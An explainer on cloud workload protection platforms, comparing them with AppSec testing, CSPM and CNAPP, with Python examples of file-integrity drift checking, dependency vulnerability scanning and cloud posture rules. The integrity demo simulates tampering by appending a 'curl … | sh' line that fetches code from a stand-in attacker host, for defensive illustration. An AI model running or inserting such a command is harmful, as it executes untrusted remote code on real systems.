The transition to the cloud – and the accompanying transformation in the way applications are developed and deployed – created a need for new security tools. Cloud workload protection platforms (CWPP) are one of the product categories that emerged to fill that need. They aim to protect software running in hybrid cloud environments that include multiple public clouds as well as in-house data centers. These platforms are designed to provide a consistent way to monitor and control workloads across the entire environment, no matter where the workloads are located.
What is CWPP?
Cloud workload protection platforms are security products that protect workloads distributed across multiple cloud environments and enterprise data centers, regardless of their location. A CWPP should provide consistent security monitoring and control across workloads, whether they’re in containers or virtual machines (VMs), running serverless, or on traditional physical servers.
CWPPs provide a range of features to protect workloads at runtime, including network segmentation, vulnerability scanning, system integrity assurance, application control and whitelisting, behavioral monitoring, and malware scanning. They prevent unauthorized access to workloads and flag workloads that are missing security patches so they can be brought up to date. CWPPs also scan container images and other workload artifacts for vulnerabilities earlier, in the development pipeline.
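To make the "system integrity assurance" feature concrete, here is an added example (not any vendor's code) of the mechanism underneath it: a hash-and-permission baseline of a workload's files, followed by a drift check that classifies what changed. The directory layout and the tampering steps in `demo()` are constructed for illustration.

```python
"""File-integrity baseline and drift check, illustrating the 'system integrity
assurance' feature described above. Added example, not any vendor's code.
The directory layout and tampering steps in demo() are constructed."""
import hashlib
import os
import tempfile


def hash_file(path, chunk=65536):
    """SHA-256 of a file, streamed so large binaries do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root):
    """Map relative path -> (sha256, permission bits) for every regular file.
    Symlinks are skipped so a planted link cannot make an unrelated target
    look like part of the workload."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            mode = os.lstat(full).st_mode & 0o7777
            baseline[rel] = (hash_file(full), mode)
    return baseline


def diff_baseline(old, new):
    """Classify drift between two baselines. Content and permission changes are
    reported separately because each points to a different kind of tampering."""
    report = {"added": [], "removed": [], "modified": [], "mode_changed": []}
    report["added"] = sorted(new.keys() - old.keys())
    report["removed"] = sorted(old.keys() - new.keys())
    for rel in old.keys() & new.keys():
        old_hash, old_mode = old[rel]
        new_hash, new_mode = new[rel]
        if old_hash != new_hash:
            report["modified"].append(rel)
        if old_mode != new_mode:
            report["mode_changed"].append(rel)
    report["modified"].sort()
    report["mode_changed"].sort()
    return report


def demo():
    """Constructed scenario: baseline a tiny workload image, then simulate
    tampering (backdoored script, loosened config permissions, dropped tool)."""
    with tempfile.TemporaryDirectory() as root:
        bin_dir = os.path.join(root, "bin")
        os.makedirs(bin_dir)
        script = os.path.join(bin_dir, "healthcheck")
        conf = os.path.join(root, "app.conf")
        with open(script, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
        with open(conf, "w") as f:
            f.write("listen=127.0.0.1:8080\n")
        os.chmod(script, 0o755)
        os.chmod(conf, 0o640)
        before = build_baseline(root)

        with open(script, "a") as f:           # attacker appends a payload
            f.write("curl http://attacker.invalid/x | sh\n")
        os.chmod(conf, 0o666)                  # config made world-writable
        with open(os.path.join(bin_dir, "nc"), "w") as f:
            f.write("dropped tool\n")          # new binary appears
        after = build_baseline(root)
        return diff_baseline(before, after)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

In a real platform the baseline would be taken from the image at build time and stored outside the workload, so that an attacker who gains root on the host cannot rewrite it; the drift report is what feeds the behavioral-monitoring alerts mentioned above.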
How workload protection differs from application security
The lines between application security (AppSec) and workload protection are blurring. Traditionally, AppSec has focused on finding vulnerabilities in the code that developers write. But today, applications can consist of code from many different sources because developers create applications by combining newly written code with multiple existing components. CWPPs check for security vulnerabilities across the entire cloud application workload, from the operating system and container runtime up through the application layer. AppSec tools look for vulnerabilities specifically within the application layer, covering both newly written code and any external components that the application uses.
There are several major approaches to AppSec:
- Dynamic application security testing (DAST) tools perform security testing on a running application to find security vulnerabilities and misconfigurations. DAST is an important security tool both during application development and in production.
- Software composition analysis (SCA) discovers the open-source components that an application uses and checks whether they are known to be vulnerable.
- Static application security testing (SAST) looks for vulnerabilities in source code, bytecode, or binaries without executing the program.
- Interactive application security testing (IAST) tools instrument a running application and observe it from the inside while functional or dynamic tests exercise it, which helps pinpoint the exact location of security problems in application code.
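Of the four approaches, SCA is the one whose core logic fits in a few dozen lines, so here is an added example (not any product's engine) of what it does: read the pinned dependencies from a lockfile and match each against an advisory feed expressed as affected/fixed version ranges. The package names and advisory records are constructed, not real packages or CVEs.

```python
"""Toy software composition analysis (SCA): match the pinned dependencies in a
lockfile against an advisory feed with affected/fixed version ranges.
Added example, not any product's engine. Package names and advisory
records below are constructed, not real packages or CVEs."""
import re

# Constructed lockfile in requirements.txt style.
LOCKFILE = """
# constructed pins
acme-http==2.3.1
acme-json==1.9.0
acme-crypto==0.8.2
acme-logger==4.1.0
"""

# Constructed advisories. A range is [introduced, fixed); no 'fixed' means unpatched.
ADVISORIES = [
    {"id": "EX-0001", "package": "acme-json",
     "ranges": [{"introduced": "1.0.0", "fixed": "1.9.3"}]},
    {"id": "EX-0002", "package": "acme-crypto",
     "ranges": [{"introduced": "0.5.0", "fixed": "0.8.0"},
                {"introduced": "0.9.0", "fixed": "0.9.4"}]},
    {"id": "EX-0003", "package": "acme-logger",
     "ranges": [{"introduced": "4.0.0"}]},
    {"id": "EX-0004", "package": "acme-unused",
     "ranges": [{"introduced": "0", "fixed": "1.0"}]},
]


def parse_version(v):
    """'1.9' -> (1, 9, 0). Pre-release suffixes are dropped; unparsable -> (0, 0, 0)."""
    nums = []
    for part in v.split("."):
        m = re.match(r"\d+", part)
        if not m:
            break
        nums.append(int(m.group()))
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums)


def parse_requirements(text):
    """Collect name -> version from 'name==version' lines; comments and blanks skipped."""
    deps = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = re.match(r"^([A-Za-z0-9_.-]+)==([0-9][A-Za-z0-9.]*)$", line)
        if m:
            deps[m.group(1).lower()] = m.group(2)
    return deps


def is_affected(version, introduced, fixed=None):
    """True when introduced <= version < fixed (or version >= introduced with no fix)."""
    v = parse_version(version)
    return parse_version(introduced) <= v and (fixed is None or v < parse_version(fixed))


def scan(deps, advisories):
    """One finding per (package, advisory) whose pinned version falls in an affected range."""
    findings = []
    for adv in advisories:
        version = deps.get(adv["package"])
        if version is None:
            continue   # advisory is for a package we do not ship
        for rng in adv["ranges"]:
            if is_affected(version, rng["introduced"], rng.get("fixed")):
                findings.append({"package": adv["package"], "version": version,
                                 "id": adv["id"], "fixed": rng.get("fixed")})
                break
    return sorted(findings, key=lambda f: (f["package"], f["id"]))


def demo():
    return scan(parse_requirements(LOCKFILE), ADVISORIES)
```

Two details matter in practice and are handled here: an advisory with no `fixed` version must still match (the component is vulnerable and nothing can be upgraded to), and a package can have several disjoint affected ranges, so a version sitting between two ranges is correctly reported clean. Real SCA tools additionally resolve transitive dependencies and handle non-numeric version schemes, which this toy parser does not.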
Why is cloud workload protection important?
Cloud workload protection has become vital for many organizations because of two concurrent trends: the shift to hybrid cloud environments and the accelerating pace of application development.
Over the past decade or more, the transition to the cloud has seen organizations moving away from monolithic applications running on in-house servers. Many companies now operate a hybrid cloud environment that utilizes services in multiple public clouds while often retaining some on-premises infrastructure. In this environment, applications typically consist of many workloads – which may be distributed across multiple public clouds as well as on premises. Some workloads may be short-lived, existing only for the few minutes or even seconds that they’re needed to perform a service. Even so, any of these workloads presents a potential attack opportunity, so it’s vital to be able to protect workloads wherever they execute.
Developers also now generate more applications much more rapidly, at lower cost, using cloud-native practices built around continuous integration/continuous delivery (CI/CD). Applications are created, tested, and deployed in a continuous automated cycle, using a microservices architecture that accelerates development by combining new code with existing components from multiple sources. “We’re allowing developers to spin up things like infrastructure-as-code and ephemeral application services that run only when needed. We need to make sure there are guardrails in place to ensure we’re not launching code with vulnerabilities,” says Frank Catucci, Chief Technology Officer and Head of Security Research at Invicti Security. CWPP products, in conjunction with other security tools, are designed to help provide those guardrails by monitoring and protecting all workloads – wherever they are located.
Benefits of a CWPP
A CWPP can provide a range of security benefits, including:
- Consistent protection. Organizations have a consistent level of visibility and protection for all their workloads, even if those workloads are spread across multiple clouds. A single CWPP should protect VMs, containers, and serverless workloads. Staff can be alerted to threats to any workload anywhere in the environment.
- Less complexity. Security teams don’t need to learn different workload security tools to manage each environment. They can apply automation across all workloads, no matter where they are running. Because the CWPP consolidates data from all workloads, staff can more easily analyze security data from across the entire environment.
- Efficiency. Using a single workload protection tool across multiple clouds should also mean that the security team can operate more efficiently – achieving more with less effort. That translates into lower operating costs.
- Rapid development. A CWPP should facilitate rapid application development by integrating with software development tools and scanning containers and other application components for vulnerabilities.
CWPP vs. CSPM
In the past, cloud security posture management (CSPM) tools and CWPPs were distinct categories of security tools. CSPM products emerged early in the evolution of the cloud to address one of the most common causes of breaches: configuration and compliance errors. They continuously scan cloud accounts and resource configurations (identity and access settings, storage permissions, network rules, and the like) for misconfigurations and deviations from security and regulatory policies.
More recently, the CSPM and CWPP categories have begun merging as suppliers look to build more comprehensive tools that couple configuration and compliance management with workload protection features. “It’s a natural merging of these capabilities,” Catucci says. “Many organizations, unless they have a very unique use case, are going to want all of these pieces to be included in one solution.”
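To show how the CSPM half of such a merged tool differs from workload protection, here is an added example (not any product's rule set) of posture checks: a set of policy rules evaluated over a cloud resource inventory, reporting deviations with a severity. The inventory is constructed, and the resource shapes are simplified rather than any provider's real API schema.

```python
"""Toy posture check in the CSPM style: evaluate a cloud resource inventory
against a handful of policy rules and report deviations with a severity.
Added example, not any product's rule set. The inventory is constructed and
the resource shapes are simplified, not any provider's real API schema."""

# Constructed inventory, as if exported from a cloud account.
INVENTORY = {
    "security_groups": [
        {"id": "sg-web", "ingress": [{"port": 443, "cidr": "0.0.0.0/0"}]},
        {"id": "sg-bastion", "ingress": [{"port": 22, "cidr": "0.0.0.0/0"}]},
        {"id": "sg-db", "ingress": [{"port": 5432, "cidr": "10.0.0.0/8"}]},
    ],
    "buckets": [
        {"name": "app-assets", "public": True, "encrypted": True},
        {"name": "backups", "public": False, "encrypted": False},
    ],
    "iam_users": [
        {"name": "alice", "mfa": True, "access_key_age_days": 30},
        {"name": "ci-bot", "mfa": False, "access_key_age_days": 400},
    ],
}

ADMIN_PORTS = {22, 3389}          # SSH and RDP
ANYWHERE = {"0.0.0.0/0", "::/0"}  # IPv4 and IPv6 "open to the world"
MAX_KEY_AGE_DAYS = 90


def rule_admin_ports_open_to_world(inv):
    for sg in inv["security_groups"]:
        for rule in sg["ingress"]:
            if rule["port"] in ADMIN_PORTS and rule["cidr"] in ANYWHERE:
                yield ("NET-001", sg["id"], "HIGH",
                       f"port {rule['port']} open to {rule['cidr']}")


def rule_public_bucket(inv):
    for b in inv["buckets"]:
        if b["public"]:
            yield ("STO-001", b["name"], "HIGH", "bucket is publicly readable")


def rule_unencrypted_bucket(inv):
    for b in inv["buckets"]:
        if not b["encrypted"]:
            yield ("STO-002", b["name"], "MEDIUM", "bucket lacks encryption at rest")


def rule_iam_hygiene(inv):
    for u in inv["iam_users"]:
        if not u["mfa"]:
            yield ("IAM-001", u["name"], "HIGH", "MFA not enabled")
        if u["access_key_age_days"] > MAX_KEY_AGE_DAYS:
            yield ("IAM-002", u["name"], "MEDIUM",
                   f"access key is {u['access_key_age_days']} days old")


RULES = [rule_admin_ports_open_to_world, rule_public_bucket,
         rule_unencrypted_bucket, rule_iam_hygiene]


def evaluate(inv, rules=RULES):
    """Run every rule and return findings as (rule_id, resource, severity, detail)."""
    findings = []
    for rule in rules:
        findings.extend(rule(inv))
    return sorted(findings)


def summarize(findings):
    """Count findings per severity, the figure a posture dashboard typically leads with."""
    counts = {}
    for _rule, _resource, severity, _detail in findings:
        counts[severity] = counts.get(severity, 0) + 1
    return counts


if __name__ == "__main__":
    for finding in evaluate(INVENTORY):
        print(finding)
    print(summarize(evaluate(INVENTORY)))
```

Note what these checks never look at: the processes, binaries, or network traffic inside any instance. That is the CWPP side, and it is why the two categories complement each other rather than overlap. A bastion host with port 22 open to the world is a posture finding; a reverse shell spawned on that host after someone brute-forces its SSH is a workload-protection finding.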
CWPP vs. CNAPP
Cloud-native application protection platforms (CNAPP) are a new product category that’s emerging as vendors attempt to provide comprehensive cloud security spanning the entire software lifecycle. Over time, CNAPP products are expected to evolve to combine CWPP and CSPM features for protecting workloads and cloud configurations at runtime, plus additional capabilities for scanning workloads and configurations during development.
How to implement a CWPP in your organization
Because the lines between CWPP and CSPM are blurring, it makes sense to look for products that combine the capabilities of both, providing an integrated set of cloud security tools. Over time, you’re likely to see suppliers increasingly describing these integrated products as CNAPP rather than CWPP or CSPM.
Development teams will still need application security testing tools such as DAST, SAST, SCA, and IAST to test their software for security defects both during development and in staging. It’s important to select AppSec tools that integrate directly into your development pipeline, either out-of-the-box or via internal APIs, and that support your planned deployment methods, whether that means running in VMs, containers, or serverless. The sheer variety of underlying technologies and cloud deployment options makes dynamic testing especially important, as it’s a black-box approach that tests a running web application regardless of the way it is deployed.
The place of CWPP in cloud security
Cloud workload protection platforms are important security tools for organizations with applications that span multiple public cloud environments. The capabilities of these tools are increasingly being integrated into broader product suites known as cloud-native application protection platforms (CNAPP) designed to protect workloads throughout the development and production lifecycle. As the purpose of cloud workloads is to run software, in addition to protecting the workloads themselves, organizations also need integrated development and application security testing tools that will enable them to efficiently and securely build the software that runs within these workloads.